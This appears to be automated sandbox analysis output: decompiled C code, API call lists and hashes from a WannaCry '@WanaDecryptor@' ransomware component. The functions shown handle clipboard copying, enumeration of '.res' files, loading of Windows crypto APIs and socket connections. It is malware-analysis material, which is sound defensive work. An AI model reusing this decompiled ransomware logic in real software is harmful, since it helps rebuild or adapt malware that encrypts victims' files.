                                                      				_push(0xffffffff);
                                                      				_push(E0041365C);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t129;
                                                      				_t130 = _t129 - 0x2e4;
                                                      				_t110 = __ecx;
                                                      				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
                                                      				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
                                                      				if(_t51 != 0) {
                                                      					_t51 = OpenClipboard( *(_t110 + 0x20));
                                                      					if(_t51 != 0) {
                                                      						_t121 = 0;
                                                      						_t126 = 0;
                                                      						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
                                                      							do {
                                                      								_push(0);
                                                      								_t71 = _t130 + 0x18;
                                                      								_push(_t121);
                                                      								_push(_t71);
                                                      								L00412D7C();
                                                      								_push(0x4206e0);
                                                      								_push(_t71);
                                                      								_push(_t130 + 0x14);
                                                      								 *(_t130 + 0x308) = 0;
                                                      								L00412CCE();
                                                      								 *(_t130 + 0x2fc) = 2;
                                                      								L00412CC2();
                                                      								 *(_t130 + 0x2fc) = 0xffffffff;
                                                      								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
                                                      								L00412CC2();
                                                      								_t121 = _t121 + 1;
                                                      							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
                                                      						}
                                                      						_t122 = GlobalAlloc(2, _t126 + 2);
                                                      						 *(_t130 + 0x14) = _t122;
                                                      						if(_t122 != 0) {
                                                      							_t54 = GlobalLock(_t122);
                                                      							 *(_t130 + 0x10) = _t54;
                                                      							if(_t54 != 0) {
                                                      								_t78 = 0;
                                                      								_t128 = 0;
                                                      								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
                                                      								if(_t55 > 0) {
                                                      									while(1) {
                                                      										_push(0);
                                                      										_push(_t78);
                                                      										_push(_t130 + 0x24);
                                                      										L00412D7C();
                                                      										_push(0x4206e0);
                                                      										_push(_t55);
                                                      										 *((intOrPtr*)(_t130 + 0x304)) = 3;
                                                      										_push(_t130 + 0x24);
                                                      										L00412CCE();
                                                      										 *(_t130 + 0x2fc) = 5;
                                                      										L00412CC2();
                                                      										_t86 =  *0x42179c; // 0x0
                                                      										 *(_t130 + 0x24) = _t86;
                                                      										memset(_t130 + 0x26, 0, 0xb3 << 2);
                                                      										_t132 = _t130 + 0xc;
                                                      										asm("stosw");
                                                      										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
                                                      										_t64 = wcslen(_t132 + 0x24);
                                                      										_t123 = _t132 + 0x28;
                                                      										_t92 = _t64 << 1 >> 2;
                                                      										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
                                                      										_t134 = _t132 + 0x18;
                                                      										_t68 = wcslen(_t134 + 0x28);
                                                      										_t130 = _t134 + 8;
                                                      										_t128 = _t128 + _t68 * 2;
                                                      										 *(_t130 + 0x2fc) = 0xffffffff;
                                                      										L00412CC2();
                                                      										_t78 = _t78 + 1;
                                                      										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
                                                      										if(_t78 >= _t55) {
                                                      											break;
                                                      										}
                                                      										_t110 =  *((intOrPtr*)(_t130 + 0x18));
                                                      									}
                                                      									_t122 =  *(_t130 + 0x14);
                                                      								}
                                                      								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
                                                      								GlobalUnlock(_t122);
                                                      								EmptyClipboard();
                                                      								SetClipboardData(0xd, _t122);
                                                      							} else {
                                                      								GlobalFree(_t122);
                                                      							}
                                                      						}
                                                      						_t51 = CloseClipboard();
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
                                                      				return _t51;
                                                      			}























                                                      APIs
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                                      • OpenClipboard.USER32(?), ref: 004035E9
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                                      • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                                      • #924.MFC42 ref: 00403635
                                                      • #800.MFC42 ref: 00403646
                                                      • #800.MFC42 ref: 00403665
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                                      • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                                      • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                                      • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                                      • #924.MFC42(00000000), ref: 00403702
                                                      • #800.MFC42(00000000), ref: 00403713
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                                      • wcslen.MSVCRT ref: 00403753
                                                      • wcslen.MSVCRT ref: 0040377B
                                                      • #800.MFC42 ref: 00403797
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                                      • EmptyClipboard.USER32 ref: 004037D4
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                                      • CloseClipboard.USER32 ref: 004037E3
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                      • String ID:
                                                      • API String ID: 3405503685-0
                                                      • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                                      • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
                                                      				void* _t31;
                                                      				int _t34;
                                                      				int _t37;
                                                      				intOrPtr _t39;
                                                      				int _t42;
                                                      				struct _WIN32_FIND_DATAA* _t54;
                                                      				void* _t75;
                                                      				struct _IO_FILE* _t76;
                                                      				struct _WIN32_FIND_DATAA* _t79;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				void* _t84;
                                                      
                                                      				_t54 = __ecx;
                                                      				_t79 = __ecx;
                                                      				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
                                                      				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
                                                      				 *(_t81 + 8) = _t31;
                                                      				if(_t31 != 0xffffffff) {
                                                      					goto L3;
                                                      					L14:
                                                      					_t75 =  *(_t81 + 0x14);
                                                      					_t54 = _t81 + 0xdc;
                                                      					if(FindNextFileA(_t75, _t54) != 0) {
                                                      						L3:
                                                      						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
                                                      							asm("repne scasb");
                                                      							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
                                                      								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
                                                      								_t81 = _t81 + 0xc;
                                                      								if(_t34 >= 1) {
                                                      									_t76 = fopen(_t81 + 0x108, "rb");
                                                      									_t81 = _t81 + 8;
                                                      									 *(_t81 + 0x18) = _t76;
                                                      									if(_t76 != 0) {
                                                      										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
                                                      										_t82 = _t81 + 0x10;
                                                      										if(_t37 == 1) {
                                                      											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
                                                      											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
                                                      											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
                                                      												if(_t39 != 0) {
                                                      													 *((char*)(_t82 + 0x21)) = 0x5c;
                                                      													 *((char*)(_t82 + 0x28)) = 0x5c;
                                                      													E00401C30(_t60, _t39, _t82 + 0x22);
                                                      													_t83 = _t82 + 8;
                                                      													_push(_t83 + 0x20);
                                                      													_push(0);
                                                      													_push(0x143);
                                                      												} else {
                                                      													sprintf(_t82 + 0x20, "My Computer");
                                                      													_t83 = _t82 + 8;
                                                      													_push(_t83 + 0x20);
                                                      													_push(0);
                                                      													_push(0x14a);
                                                      												}
                                                      												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
                                                      												_push(0x88);
                                                      												L00412CEC();
                                                      												_t84 = _t83 + 4;
                                                      												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
                                                      												_t82 = _t84 + 0xc;
                                                      												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
                                                      												_t76 =  *(_t82 + 0x18);
                                                      												_t79 =  *((intOrPtr*)(_t82 + 0x10));
                                                      											}
                                                      										}
                                                      										fclose(_t76);
                                                      										_t81 = _t82 + 4;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L14;
                                                      					} else {
                                                      						FindClose(_t75);
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$My Computer$\$\
                                                      • API String ID: 1476605332-298172004
                                                      • Opcode ID: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                                      • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                                      • Opcode Fuzzy Hash: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                                      • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404B70() {
                                                      				_Unknown_base(*)()* _t9;
                                                      				struct HINSTANCE__* _t20;
                                                      
                                                      				if( *0x4217c0 == 0) {
                                                      					_t20 = LoadLibraryA("advapi32.dll");
                                                      					if(_t20 == 0) {
                                                      						L10:
                                                      						return 0;
                                                      					} else {
                                                      						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
                                                      						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
                                                      						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
                                                      						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
                                                      						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
                                                      						_t9 = GetProcAddress(_t20, "CryptGenKey");
                                                      						 *0x4217d4 = _t9;
                                                      						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
                                                      							goto L10;
                                                      						} else {
                                                      							return 1;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}






                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                                      • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                                      • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                                      • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                                      • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                      • API String ID: 2238633743-2459060434
                                                      • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                                      • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E004080C0(intOrPtr __ecx) {
                                                      				void _v999;
                                                      				char _v1000;
                                                      				void* _v1012;
                                                      				char _v1100;
                                                      				char _v1200;
                                                      				char _v1476;
                                                      				signed char _v1520;
                                                      				intOrPtr _v1648;
                                                      				void _v1656;
                                                      				intOrPtr _v1660;
                                                      				intOrPtr _v1664;
                                                      				intOrPtr _v1668;
                                                      				intOrPtr _v1672;
                                                      				intOrPtr _v1696;
                                                      				void _v1788;
                                                      				void _v1792;
                                                      				void* _v1796;
                                                      				char _v1800;
                                                      				intOrPtr _v1804;
                                                      				intOrPtr _v1808;
                                                      				void* _v1820;
                                                      				char _t44;
                                                      				void* _t47;
                                                      				void* _t50;
                                                      				void* _t54;
                                                      				int _t57;
                                                      				int _t60;
                                                      				int _t62;
                                                      				struct _WIN32_FIND_DATAA* _t74;
                                                      				intOrPtr _t103;
                                                      				void* _t104;
                                                      				struct _IO_FILE* _t105;
                                                      				void* _t110;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				void* _t126;
                                                      
                                                      				_t103 = __ecx;
                                                      				memset( &_v1788, 0, 0x21 << 2);
                                                      				_t44 =  *0x421798; // 0x0
                                                      				_v1000 = _t44;
                                                      				_v1808 = _t103;
                                                      				memset( &_v999, 0, 0xf9 << 2);
                                                      				_t110 =  &_v1808 + 0x18;
                                                      				asm("stosw");
                                                      				_t74 =  &_v1520;
                                                      				_v1804 = 0;
                                                      				asm("stosb");
                                                      				_t47 = FindFirstFileA("*.res", _t74);
                                                      				_v1796 = _t47;
                                                      				if(_t47 == 0xffffffff) {
                                                      					L13:
                                                      					_push(_v1804);
                                                      					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
                                                      					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
                                                      					_t113 = _t110 + 0x30;
                                                      					_push(0);
                                                      					_v1808 = _t113;
                                                      					L00412CAA();
                                                      					_t79 = _t103;
                                                      					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
                                                      					if(_t54 != 0xffffffff) {
                                                      						return _t54;
                                                      					}
                                                      					_push(0);
                                                      					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
                                                      					L00412CAA();
                                                      					return E004082C0(_t103, _t113 + 0x340, _t79);
                                                      				} else {
                                                      					goto L2;
                                                      					L11:
                                                      					_t104 = _v1796;
                                                      					_t74 =  &_v1520;
                                                      					_t57 = FindNextFileA(_t104, _t74);
                                                      					_t124 = _t57;
                                                      					if(_t57 != 0) {
                                                      						L2:
                                                      						if((_v1520 & 0x00000010) == 0) {
                                                      							asm("repne scasb");
                                                      							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
                                                      								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
                                                      								_t110 = _t110 + 0xc;
                                                      								if(_t60 >= 1) {
                                                      									_t105 = fopen( &_v1476, "rb");
                                                      									_t110 = _t110 + 8;
                                                      									if(_t105 != 0) {
                                                      										_t62 = fread( &_v1656, 0x88, 1, _t105);
                                                      										_t114 = _t110 + 0x10;
                                                      										if(_t62 == 1 && _v1648 == _v1800) {
                                                      											_v1804 = _v1804 + 1;
                                                      										}
                                                      										fclose(_t105);
                                                      										_t110 = _t114 + 4;
                                                      										if(_v1648 == 0) {
                                                      											memcpy( &_v1792,  &_v1656, 0x22 << 2);
                                                      											_t110 = _t110 + 0xc;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L11;
                                                      					} else {
                                                      						FindClose(_t104);
                                                      						_t103 = _v1808;
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      			}








































                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                                      • API String ID: 1530363904-2310201135
                                                      • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                                      • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • htons.WS2_32 ref: 0040D6C7
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                                      • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                                      • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                                      • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                                      • closesocket.WS2_32(00000000), ref: 0040D80E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                                      • String ID: `
                                                      • API String ID: 478405425-1850852036
                                                      • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                                      • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00411CF0(intOrPtr* __ecx) {
                                                      				intOrPtr _t142;
                                                      				signed int _t147;
                                                      				signed int _t149;
                                                      				intOrPtr _t150;
                                                      				void* _t152;
                                                      				signed int _t157;
                                                      				signed int _t160;
                                                      				unsigned int _t162;
                                                      				signed char _t164;
                                                      				struct _FILETIME _t177;
                                                      				struct _FILETIME _t180;
                                                      				intOrPtr _t182;
                                                      				signed int _t186;
                                                      				signed char _t188;
                                                      				struct _FILETIME _t204;
                                                      				struct _FILETIME _t212;
                                                      				signed int _t215;
                                                      				signed int _t217;
                                                      				signed int _t219;
                                                      				intOrPtr* _t226;
                                                      				signed int _t231;
                                                      				signed int _t232;
                                                      				signed int _t234;
                                                      				signed int _t235;
                                                      				signed int _t239;
                                                      				unsigned int _t248;
                                                      				signed int _t249;
                                                      				int _t252;
                                                      				signed char _t264;
                                                      				intOrPtr _t269;
                                                      				intOrPtr* _t273;
                                                      				signed int _t276;
                                                      				unsigned int _t297;
                                                      				signed int _t299;
                                                      				intOrPtr _t300;
                                                      				signed int _t303;
                                                      				intOrPtr _t307;
                                                      				intOrPtr _t309;
                                                      				signed int _t311;
                                                      				intOrPtr _t312;
                                                      				intOrPtr _t313;
                                                      				intOrPtr* _t321;
                                                      				signed int _t329;
                                                      				intOrPtr* _t336;
                                                      				void* _t337;
                                                      				void* _t338;
                                                      				signed int _t340;
                                                      				signed int _t341;
                                                      				void* _t343;
                                                      				void* _t346;
                                                      				void* _t348;
                                                      				void* _t349;
                                                      				void* _t350;
                                                      				void* _t351;
                                                      				void* _t353;
                                                      				void* _t354;
                                                      				void* _t355;
                                                      				void* _t356;
                                                      
                                                      				_t312 =  *((intOrPtr*)(_t348 + 0x294));
                                                      				_t232 = _t231 | 0xffffffff;
                                                      				_t336 = __ecx;
                                                      				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
                                                      				if(_t312 < _t232) {
                                                      					L72:
                                                      					return 0x10000;
                                                      				} else {
                                                      					_t140 =  *__ecx;
                                                      					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                      						goto L72;
                                                      					} else {
                                                      						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
                                                      							E00411AC0(_t140);
                                                      							_t348 = _t348 + 4;
                                                      						}
                                                      						 *(_t336 + 4) = _t232;
                                                      						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
                                                      							__eflags = _t312 - _t232;
                                                      							if(_t312 != _t232) {
                                                      								_t142 =  *_t336;
                                                      								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
                                                      								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
                                                      									E00411390(_t142);
                                                      									_t348 = _t348 + 4;
                                                      								}
                                                      								_t143 =  *_t336;
                                                      								__eflags =  *( *_t336 + 0x10) - _t312;
                                                      								while(__eflags < 0) {
                                                      									E004113E0(_t143);
                                                      									_t143 =  *_t336;
                                                      									_t348 = _t348 + 4;
                                                      									__eflags =  *( *_t336 + 0x10) - _t312;
                                                      								}
                                                      								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
                                                      								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
                                                      								_t349 = _t348 + 0x30;
                                                      								__eflags = _t147;
                                                      								if(_t147 == 0) {
                                                      									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
                                                      									_t350 = _t349 + 0xc;
                                                      									__eflags = _t149;
                                                      									if(_t149 == 0) {
                                                      										_t150 =  *((intOrPtr*)(_t350 + 0x10));
                                                      										_push(_t150);
                                                      										L00412CEC();
                                                      										_t313 = _t150;
                                                      										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
                                                      										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
                                                      										_t351 = _t350 + 0x14;
                                                      										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
                                                      										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
                                                      											_t346 =  *(_t351 + 0x29c);
                                                      											asm("repne scasb");
                                                      											_t248 =  !_t232;
                                                      											 *_t346 =  *( *_t336 + 0x10);
                                                      											_t337 = _t351 + 0x88 - _t248;
                                                      											_t249 = _t248 >> 2;
                                                      											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
                                                      											__eflags = _t252;
                                                      											memcpy(_t337 + _t249 + _t249, _t337, _t252);
                                                      											_t353 = _t351 + 0x18;
                                                      											_t321 = _t353 + 0x190;
                                                      											while(1) {
                                                      												_t157 =  *_t321;
                                                      												__eflags = _t157;
                                                      												if(_t157 == 0) {
                                                      													goto L23;
                                                      												}
                                                      												L21:
                                                      												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
                                                      												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
                                                      													_t321 = _t321 + 2;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												L23:
                                                      												__eflags = _t157 - 0x5c;
                                                      												if(_t157 == 0x5c) {
                                                      													_t321 = _t321 + 1;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												__eflags = _t157 - 0x2f;
                                                      												if(_t157 == 0x2f) {
                                                      													_t321 = _t321 + 1;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("\\..\\");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t41 = _t157 + 4; // 0x4
                                                      													_t321 = _t41;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("\\../");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t42 = _t157 + 4; // 0x4
                                                      													_t321 = _t42;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
